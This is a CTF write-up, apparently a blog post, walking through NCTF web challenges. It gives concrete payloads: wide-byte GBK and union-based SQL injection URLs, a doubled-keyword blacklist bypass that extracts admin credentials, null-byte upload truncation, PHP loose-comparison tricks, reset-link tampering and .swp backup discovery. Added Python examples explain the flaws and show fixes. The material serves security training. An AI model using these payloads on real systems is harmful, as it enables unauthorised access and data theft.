    1. The uploaded file's extension has to be php and at the same time jpg, png or gif.
    2. The code matches in two places:
1. filename
2. the upload path: /uploads/
  • Let's see how path is built; change path and filename and observe:

1. filename=download.jpg
2. uppath=/uploads/dowload.phpdownload.jpg
3. upfilename=path & filename
  • Use 0x00 truncation (see this article on truncated uploads) to cut off the download.jpg after download.php:
    uppath=/uploads/download.phpchr(0)download.jpg
  • nctf{welcome_to_hacks_world}

Naming things is hard

Address: the code is as follows

<?php
function noother_says_correct($number)
{
    $one = ord('1');
    $nine = ord('9');
    for ($i = 0; $i < strlen($number); $i++)
    {
        $digit = ord($number{$i});
        if ( ($digit >= $one) && ($digit <= $nine) )
        {
            return false;
        }
    }
    return $number == '54975581388';
}
$flag='*******';
if(noother_says_correct($_GET['key']))
    echo $flag;
else
    echo 'access denied';
?>

  • Analysis:
    1. noother_says_correct($_GET['key']) must be true
    2. so $number == '54975581388' must hold and return true
    3. yet the code before it rejects $number if it contains any digit 1-9
  • Exploit the == behaviour

  • 54975581388 in hexadecimal is ccccccccc
    http://chinalover.sinaapp.com/web12/index.php?key=0xccccccccc
    The flag is:nctf{follow_your_dream}
  • nctf{follow_your_dream}

sql injection 3

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

  • Wide-byte injection
  1. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1'
your sql:select id,title from news where id = '1\''
Hello World!OVO
  2. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df'
your sql:select id,title from news where id = '1運''

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in SQL-GBK/index.php on line 10

  3. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=1 -- -
your sql:select id,title from news where id = '1運' and 1=1 -- -'
Hello World!OVO
  4. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 -- -
your sql:select id,title from news where id = '1運' and 1=2 -- -'
  • Good, it is injectable
  5. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' order by 2 -- -
your sql:select id,title from news where id = '1運' order by 2 -- -'
Hello World!OVO
  6. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,2 -- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,2 -- -'
2
  7. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,concat_ws(0x7c,user(),database(),version()) -- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,concat_ws(0x7c,user(),database(),version()) -- -'
sae-chinalover@220.181.129.119|sae-chinalover|5.5.52-0ubuntu0.14.04.1
  8. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sae-chinalover'-- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=\'sae-chinalover\'-- -'

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in SQL-GBK/index.php on line 10

The single quotes were escaped.

  9. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572-- -

sae-chinalover in hexadecimal is 0x7361652d6368696e616c6f766572; the hex form gets around the quote escaping.

your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572-- -'
ctf,ctf2,ctf3,ctf4,news
  • The flag is in ctf2
  10. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746632 and table_schema=0x7361652d6368696e616c6f766572-- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746632 and table_schema=0x7361652d6368696e616c6f766572-- -'
id,content
  11. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(id,content) from ctf2-- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(id,content) from ctf2-- -'
1020no msg in 1020,1021no msg in 1021 too,1022no msg in 1022,1023no msg in 1023~~~,1024the flag is:nctf{query_in_mysql},1025no more
  • nctf{query_in_mysql}
  • This problem seems to be broken; other people's writeups show a different link, but the point is still wide-byte injection: nctf{gbk_3sqli}.
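What the second request above shows is the whole mechanism: the escaping routine works on bytes and puts a backslash (0x5c) before the quote, but the database reads the statement as GBK, where 0xdf 0x5c is one two-byte character (運), so the quote that follows is bare again. As an added example (not the challenge's code), here it is reproduced in Python with a byte-wise addslashes, plus the fix: a bound parameter, demonstrated on a constructed in-memory SQLite table standing in for the challenge's news table.

```python
import sqlite3
from typing import List, Tuple

PREFIX = "select id,title from news where id = '"


def addslashes(raw: bytes) -> bytes:
    """Byte-wise quote escaping, like addslashes() or mysql_real_escape_string()
    when the client charset does not match the server's GBK."""
    return raw.replace(b"\\", b"\\\\").replace(b"'", b"\\'").replace(b'"', b'\\"')


def build_query_gbk(id_bytes: bytes) -> str:
    """Escape the raw bytes, splice them into the SQL, then read the result as
    GBK, which is what the database on the challenge server did."""
    sql = PREFIX.encode("ascii") + addslashes(id_bytes) + b"'"
    return sql.decode("gbk", errors="replace")


def quote_still_escaped(id_bytes: bytes) -> bool:
    """After GBK decoding, is every quote inside the spliced value still
    preceded by a backslash?"""
    value = build_query_gbk(id_bytes)[len(PREFIX):-1]   # text between the quotes
    return "'" not in value.replace("\\'", "")


def make_news_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the challenge's `news`."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table news(id text, title text)")
    conn.executemany("insert into news values(?, ?)",
                     [("1", "Hello World!OVO"), ("2", "second post")])
    return conn


def safe_lookup(conn: sqlite3.Connection, user_id: str) -> List[Tuple[str, str]]:
    """Parameter binding: the value travels separately from the SQL text, so no
    byte sequence inside it can change the statement, whatever the charset."""
    return conn.execute(
        "select id, title from news where id = ?", (user_id,)
    ).fetchall()
```

Escaping-based defences depend on the escaper and the parser agreeing about character boundaries; with MySQL that means setting the connection charset through the API (mysql_set_charset in the old extension) rather than with a SET NAMES query, and better still, not splicing values into SQL at all.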

Password Reset

Reset the password of the administrator account: admin

After you clicked "forgot password", your mailbox received a password-reset e-mail like this:

Click this link to reset your password

  • http://nctf.nuptzj.cn/web13/index.php?user1=Y3RmdXNlcg==
    Y3RmdXNlcg== is ctfuser in base64
  • Change user=admin and set the URL's user1=base64(admin); that is all


  • nctf{reset_password_often_have_vuln}

sql injection 4

Keep injecting~
Problem address

TIP: a backslash can be used to escape
Read the documentation of the relevant functions carefully

  • View source
<!--
#GOAL: login as admin,then get the flag;
error_reporting(0);
require 'db.inc.php';

function clean($str){
    if(get_magic_quotes_gpc()){
        $str=stripslashes($str);
    }
    return htmlentities($str, ENT_QUOTES);
}

$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);

$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
    die('Invalid password!');
}

echo $flag;
-->
Invalid password!
  • The SQL statement
    SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';
    is equivalent to:
    SELECT * FROM users WHERE name=' $username' AND pass='$password';
  • Single-quote SQL statements
    1. Add a single quote to close the first one; because of the stripslashes escaping earlier this does not work.
    http://chinalover.sinaapp.com/web15/index.php?username=admin' or 1=1 1-- - &password=123
    2. Use \ to escape away the second quote:
    http://chinalover.sinaapp.com/web15/index.php?username=admin&password= or 1=1 -- -
    The SQL statement becomes:
    SELECT * FROM users WHERE name=' admin\' AND pass= ' or 1=1 -- -';
  • Refresh and the flag appears: flag:nctf{sql_injection_is_interesting}
  • nctf{sql_injection_is_interesting}

Where are you from

Did you come from google?
Portal: problem address

  • In principle setting referer === "https://www.google.com/ should do it, but the site seems to be down; the source confirms that this is the intended solution.
<?php
$referer = $_SERVER['referer'];
if ($referer === "https://www.google.com/ " || $referer === "https://www.google.com"){
    echo "nctf{http_referer}";
}else{
    echo "are you from google?";
}
?>

AAencode

javascript aaencode

Portal: problem address

  • Opening the link showed the AAencode as mis-encoded garbage, which should not happen.

  • Viewed in the page source it is intact; this AAencode can be run directly in the browser console:
    ゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (o^_^o)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + 
(゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (o^_^o))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚o゚]) (゚Θ゚)) ('_');

  • nctf{javascript_aaencode}


PHP Deserialization

http://115.28.150.176/php1/index.php
Code:

<?php
class just4fun {
    var $enter;
    var $secret;
}

if (isset($_GET['pass'])) {
    $pass = $_GET['pass'];

    if(get_magic_quotes_gpc()){
        $pass=stripslashes($pass);
    }

    $o = unserialize($pass);

    if ($o) {
        $o->secret = "*";
        if ($o->secret === $o->enter)
            echo "Congratulation! Here is my secret: ".$o->secret;
        else 
            echo "Oh no... You can't fool me";
    }
    else echo "are you trolling?";
}
?>

  • I could not do this one, haha, too much of a noob.

SQL Injection 2

Second injection problem~~ mainly about union queries
Portal: click me to fly

  • Source:
<html>
<head>
Secure Web Login II
</head>
<body>

<?php
if($_POST[user] && $_POST[pass]) {
  mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = $_POST[user];
  $pass = md5($_POST[pass]);
  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
  if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
    echo "<p>Logged in! Key: ntcf{**************} </p>";
  }
  else {
    echo("<p>Log in failure!</p>");
  }
}
?>


<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>
  • Key statements:
1.  $pass = md5($_POST[pass]);
2.  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
3.  strcasecmp(): returns 0 if the two are equal.
  • We can select a password of our own and hand it back in $query:
    select pw from ctf where user='$user' and 0=1 union select md5(123) -- -
1. and 0=1 makes the preceding select pw from ctf where user='$user' false, so it returns nothing.
2. The whole statement therefore returns md5(123) into $query
3. That sidesteps the database lookup: we assign $query ourselves
  • ntcf{union_select_is_wtf}

Comprehensive Problem 2

Not an XSS problem, but feel free to leave a comment~
Address: get the flag

  • Click the "About this CMS" link at the very bottom:
    http://cms.nuptzj.cn/about.php?file=sm.txt
    It shows:
    Obviously this is a leftover file from installation that someone forgot to delete... As for why the link shows up on the home page, ask the administrator... ===============================gorgeous divider============================= This CMS is a company message-board system developed by Funny Inc.; according to our CTO it was built with world-class technology and is rock solid in both security and practicality~</br> Below is a description of the files in this CMS (the programmer was lazy and only listed some) config.php: holds the database information; change it when porting this CMS index.php: home page passencode.php: Funny Inc.'s home-grown password encryption library say.php: receives and processes users' message requests sm.txt: this CMS's documentation SAE's information_schema table does not seem to be searchable, so here is the admin table structure: create table admin ( id integer, username text, userpass text, ) ======================================================================== Now seriously: this penetration-testing platform was developed by 三只小潴 (root#zcnhonker.net) & 冷爱 (hh250@qq.com) and painstakingly modified by your boss Zhou; we can't have every problem AKed, right? So for this one... if you solve it you are awesome.
  • The URL is clearly a file inclusion, so let's read about.php's source:
1. php://filter can be used
2. the file parameter itself exists to show source, so file=about.php works directly

about.php source:

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
$file=$_GET['file'];
if($file=="" || strstr($file,'config.php')){
    echo "file参数不能为空!";
    exit();
}
else{
    $cut=strchr($file,"loginxlcteam");
    if($cut==false){
        $data=file_get_contents($file);
        $date=htmlspecialchars($data);
        echo $date;
    }
    else{
        echo "<script>alert('敏感目录,禁止查看!但是。。。')</script>";
    }
}
  • file=loginxlcteam is probably the login page
  • Function notes:
1. strstr() finds the first occurrence of one string inside another and returns FALSE if it is not found.
2. strchr() is an alias of strstr().
3. (a): file=config.php or an empty file returns "file参数不能为空!" (the file parameter must not be empty)
   (b): file=loginxlcteam returns "敏感目录,禁止查看!但是。。。" (sensitive directory, viewing forbidden! but...)
  • Conclusion: about.php is simply an endpoint for reading page source.
  • Plan:

1. The search box is SQL-injectable; get the administrator's username and password from it
2. Get a shell


1. SQL injection
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>搜索留言</title> 
</head> 
<body> 
<center> 
<div id="say" name="say" align="left" style="width:1024px"> 
<?php 
if($_SERVER['HTTP_USER_AGENT']!="Xlcteam Browser"){ 
echo '万恶滴黑阔,本功能只有用本公司开发的浏览器才可以用喔~'; 
exit(); 
} 
$id=$_POST['soid']; 
include 'config.php'; 
include 'antiinject.php'; 
include 'antixss.php'; 
$id=antiinject($id); 
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error()); 
mysql_select_db($db_name,$con); 
$id=mysql_real_escape_string($id); 
$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");
$rs=mysql_fetch_array($result); 
echo htmlspecialchars($rs['nice']).':<br />&nbsp;&nbsp;&nbsp;&nbsp;'.antixss($rs['say']).'<br />';
mysql_free_result($result); 
mysql_free_result($file); 
mysql_close($con); 
?> 
</div> 
</center> 
</body> 
</html>
<?php
function antiinject($content){
    $keyword=array("select","union","and","from",' ',"'",";",'"',"char","or","count","master","name","pass","admin","+","-","order","=");
    $info=strtolower($content);
    for($i=0;$i<=count($keyword);$i++){
        $info=str_replace($keyword[$i], '',$info);
    }
    return $info;
}
?>
  • Bypassing the blacklist. Unlike the $_SERVER["REQUEST_URI"] case in [AceBear CTF 2018] Web-urlparameter:
    1. here the method is POST, whereas urlparameter was GET.
    2. here you cannot simply rewrite the URL as in urlparameter.
  • Use the insert-double-write bypass, with /**/ comments in place of spaces
  • Injection steps:
1. soid=2/**/oorroorrderder/**/by/**/4
2. soid=1/**/aandnd/**/1>2/**/uunionnion/**/sselectelect/**/1,2,3,4
or: soid=0/**/uunionnion/**/sselectelect/**/1,2,3,4
3. soid=1/**/aandnd/**/1>2/**/uunionnion/**/sselectelect/**/1,concat_ws(0x7c,id,usernnameame,userppassass),3,4/**/ffromrom/**/aadmindmin

Result: 1|admin|102 117 99 107 114 117 110 116 117

  • The password 102 117 99 107 114 117 110 116 117 decoded from ASCII is fuckruntu

  • I first found a back-end login page by scanning with 御剑, which turned out to be the wrong one; the about.php source had already given away the login page: file=loginxlcteam

  • http://cms.nuptzj.cn/loginxlcteam
2. Log in and get a shell
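The filter fails because str_replace removes each keyword in a single pass: split a keyword with a copy of itself and the one removal reassembles it. As an added example (not the CMS's code), the filter is transcribed to Python, a "repeat until stable" variant shows why patching the blacklist is still the wrong fix, and parse_message_id shows the positive validation the search page should have used for a numeric id.

```python
import re
from typing import Optional

# Keyword list as in the page's antiinject.php
KEYWORDS = ["select", "union", "and", "from", " ", "'", ";", '"', "char", "or",
            "count", "master", "name", "pass", "admin", "+", "-", "order", "="]


def antiinject(content: str) -> str:
    """The page's filter: lower-case, then one str_replace pass per keyword.

    Each keyword is removed once, so "u" + "union" + "nion" loses the inner
    copy and leaves "union" behind.
    """
    info = content.lower()
    for kw in KEYWORDS:
        info = info.replace(kw, "")
    return info


def antiinject_until_stable(content: str) -> str:
    """Repeating the pass until nothing changes closes the double-write hole,
    but it is still a blacklist: it mangles harmless text (any "or" inside a
    word) and knows nothing about syntax it has not listed."""
    info = content.lower()
    while True:
        stripped = info
        for kw in KEYWORDS:
            stripped = stripped.replace(kw, "")
        if stripped == info:
            return info
        info = stripped


def parse_message_id(content: str) -> Optional[int]:
    """Positive validation: a message id is a short run of digits, nothing
    else. Anything that does not fit is refused instead of being cleaned;
    the int is then bound as a query parameter, never spliced into SQL."""
    return int(content) if re.fullmatch(r"\d{1,9}", content) else None
```

The search page's query has no quotes around id at all, so even a perfect escaper would not help; the only robust rule is "decide what the input must look like, accept exactly that, bind it".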

Password Reset 2

The problem got solved in seconds, and I was not happy about it!
This problem comes from CUMT
Problem link

TIPS:
1. The administrator's e-mail can be found just by looking around
2. Linux users usually edit with vi, and an abnormal exit leaves a backup file behind
3. Weak-type bypass

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="renderer" content="webkit" />
<meta name="admin" content="admin@nuptzj.cn" />
<meta name="editor" content="Vim" />
<title>logic</title>
<style type="text/css">
body,html{
    position: relative;
    height: 100%;
    width: 100%;
    padding: 0;
    margin: 0;
    background-color: #272822;
    color: #fff;
}
form{
    position: absolute;
    top: 50%;
    left: 50%;
    width: 400px;
    margin: -70px -200px;
}
form input{
    display: block;
    margin: 10px auto;
    width: 100%;
    border: none;
    height: 2rem;
    border-radius: 5px;
}
</style>
</head>
<body>
<form action="submit.php" method="GET">
<h1>找回管理员密码</h1> email:<input name="emailAddress" type="text" />
</br> token:<input name="token" type="text" />
</br> <input type="submit" value="提交">
</form>
</body>
</html>
  • Try to locate the .swp file:
1. http://nctf.nuptzj.cn/web14/.index.php.swp  ---- Not Found
2. http://nctf.nuptzj.cn/web14/.submit.php.swp ---- Success

........ this line stands for omitted code ........

/*
If the login e-mail address is not the administrator's, die()
Database structure

--
-- Table structure for table `user`
--

CREATE TABLE IF NOT EXISTS `user` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(255) NOT NULL,
  `email` varchar(255) NOT NULL,
  `token` int(255) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;

--
-- Dumping data for table `user`
--

INSERT INTO `user` (`id`, `username`, `email`, `token`) VALUES
(1, '****不可见***', '***不可见***', 0);
*/


........ this line stands for omitted code ........

if(!empty($token)&&!empty($emailAddress)){
    if(strlen($token)!=10) die('fail');
    if($token!='0') die('fail');
    $sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
    $r = mysql_query($sql) or die('db error');
    $r = mysql_fetch_assoc($r);
    $r = $r['num'];
    if($r>0){
        echo $flag;
    }else{
        echo "失败了啊";
    }
}
    
  • Key code:
if(strlen($token)!=10) die('fail');
if($token!='0') die('fail');
  • Set token=0000000000: it is ten characters long and, being a numeric string, it compares == to '0', so both checks pass. The real point of the problem is finding the .swp file.
    flag:nctf{thanks_to_cumt_bxs}
  • nctf{thanks_to_cumt_bxs}

Injection Practice 1

Please use Firefox with the HackBar add-on installed (look it up and get familiar with it yourself)
Target URL: address
The flag is the administrator password's 32-character md5 (lowercase)
wrapped in nctf{}

The manual-injection tutorial was posted in the group.
If you cannot follow it, search for "mysql manual injection" and read up

PS: if you did it with sqlmap or similar tools, don't have the cheek to submit

  • Looks like this one is dead; reference article